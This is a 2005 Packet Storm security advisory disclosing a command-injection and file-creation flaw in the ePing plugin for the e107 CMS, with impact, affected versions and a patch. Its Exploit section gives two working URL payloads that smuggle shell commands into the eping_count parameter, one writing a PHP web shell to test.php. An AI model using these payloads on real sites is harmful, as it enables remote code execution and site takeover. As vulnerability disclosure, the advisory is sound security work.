OS2A-1001.txt

2005-08-09T00:00:00
ID PACKETSTORM:39156
Type packetstorm
Reporter Packet Storm
Modified 2005-08-09T00:00:00

Description

                                        
                                            `OS2A  
  
ePing Arbitrary File Creation/Command Execution Vulnerability  
  
  
OS2A ID: OS2A_1001 Status Published: 08/04/2005 Updated : 08/05/2005   
Patch Released  
  
Class: File Creation/Command Execution   
Severity: CRITICAL  
  
  
Overview:  
ePing is a ping utility plugin for e107, a PHP-based content management system that uses a MySQL backend database. ePing versions 1.02 and prior are vulnerable to a file creation vulnerability caused by improper validation of user-supplied input in the doping.php script. A remote attacker exploiting this vulnerability could then create an arbitrary file in the webserver, pipe multiple system commands in the eping_host or the eping_count parameters of the doping.php script, which would be executed within the security context of the hosting site.  
  
eTrace, another utility plugin for e107 has similar vulnerabilities.  
  
Description:  
e107 portal's eping plugin 1.02 and prior is prone to remote command execution vulnerability. This vulnerability exists due to output redirection operators like '>', '|', '&' are not being sanitized in eping_host,eping_count parameters in the doping.php script.   
  
eping_host has a validate function in functions.php which does not consider the above mentioned case.   
  
eping_count has no validation logic. It accepts the above mentioned system meaningful characters.   
  
  
Impact:  
A remote user can execute any command using '|' character or create a file with malicious executable code with '>' character. Execution of arbitrary command or creation of arbitrary files can lead to, Denial of service, Disclosure or   
modification of system information or Execution of arbitrary code.  
  
  
Affected Systems:  
ePing version 1.02 and prior  
Linux (Any), Unix (Any), Windows (Any)  
  
  
Exploit:  
  
a.   
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping%20-n&eping_host=127.0.0.1&eping_count=2%20%22%3C?php%20system(%94cmd.exe%94)?%3E%22%20%3Etest.php  
  
b.  
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping%20-n&eping_host=127.0.0.1&eping_count=2|dir  
  
  
Solutions:  
Patch:  
Upgrade to the version 1.03 of ePing and eTrace plugins.   
`